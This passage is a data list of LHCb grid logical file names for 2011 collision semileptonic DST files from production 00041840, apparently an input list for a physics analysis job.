'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012058_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055251_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033582_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026704_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026637_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016122_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059211_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000212_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033104_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008321_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011286_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061916_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004831_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054561_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041427_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044275_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021823_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021417_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014259_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049025_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053068_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065394_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055393_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028054_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053069_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033497_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058371_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056876_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065615_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036645_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062682_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038068_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067906_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049037_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056875_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002511_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032980_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031641_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067268_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027317_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002439_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037860_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060678_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055486_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012895_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053535_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006152_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054786_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065614_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040595_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061360_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033265_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016880_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001747_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064333_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026998_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003831_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050533_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042869_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060789_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040951_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042561_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058195_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003799_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024754_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016912_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016060_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030947_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013837_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003686_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019059_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049790_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039886_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027275_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012641_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023807_1.semileptonic.dst',
